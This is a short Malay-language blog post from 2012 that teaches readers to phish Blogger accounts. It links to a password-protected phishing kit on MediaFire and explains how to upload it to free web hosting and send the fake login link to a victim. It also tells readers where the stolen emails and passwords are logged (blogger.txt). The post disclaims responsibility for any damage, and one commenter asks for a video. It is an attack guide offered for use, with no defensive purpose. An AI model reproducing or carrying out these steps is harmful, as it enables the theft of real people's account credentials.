Saturday, 16 June 2012

1 Cara nak phishing blogspot



Asalamualaikum . Hari ini aku nak ajar enkorang semua pancing blogger . mula-mula download benda yang diperlukan :

http://www.mediafire.com/?bn0njs8m708t8yn
*pasword : herryjack

1. Lepas download file yang diperlukan ni , Buat folder baru dan nama kan folder tuh nama apa yang korang nak.

2. Extract file-file nih kedalam satu folder .

3. Lepas tuh gi kat free webhosting atau mana-mana hosting lah okay x)

4. Lepas login , upload file-file yang dah di extractkan tadi .

*NOTE : Ingat upload kat public_html. 

5. Lepas selesai upload tekan open kat file index.html then copy link nya bagi kat mangsa korang .

*NOTE : Kalau nak tengok email ngan pasword mangsa , view blogger.txt

6. Done

Sebarang kerosakan tidak akan ditanggungjawab.

1 Comments

Fitri Fahim said...

Video x derr??? x faham la

Bagaimana Pendapat Anda ?

Comment Here